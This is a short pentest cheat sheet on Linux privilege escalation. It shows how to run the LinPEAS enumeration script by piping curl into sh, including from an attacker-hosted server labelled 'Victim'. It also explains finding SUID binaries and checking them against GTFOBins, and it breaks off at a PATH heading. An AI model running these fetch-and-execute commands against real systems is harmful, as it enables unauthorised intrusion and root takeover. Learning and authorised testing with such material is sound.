Linux Privilege Escalation

Sharing is caring

Views: 9

LinPEAS

Latest Releases: Release Release refs/heads/master 20230425-bd7331ea · carlospolop/PEASS-ng · GitHub

# From Github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Local network
sudo python3 -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim

Privilege Escalation: SUID

Finding SUID Binaries

Use the command: “find / -perm -u=s -type f 2>/dev/null” to search the file system for SUID/GUID files. Let’s break down this command.

find – Initiates the “find” command

– Searches the whole file system

-perm – searches for files with specific permissions

-u=s – Any of the permission bits mode are set for the file. Symbolic modes are accepted in this form

-type f – Only search for files

2>/dev/null – Suppresses errors

find / -type f -perm -04000 -ls 2>/dev/null

A good practice would be to compare executables on this list with GTFOBins (https://gtfobins.github.io). Clicking on the SUID button will filter binaries known to be exploitable when the SUID bit is set (you can also use this link for a pre-filtered list https://gtfobins.github.io/#+suid).

The list above shows that nano has the SUID bit set. Unfortunately, GTFObins does not provide us with an easy win. Typical to real-life privilege escalation scenarios, we will need to find intermediate steps that will help us leverage whatever minuscule finding we have.

Privilege Escalation: PATH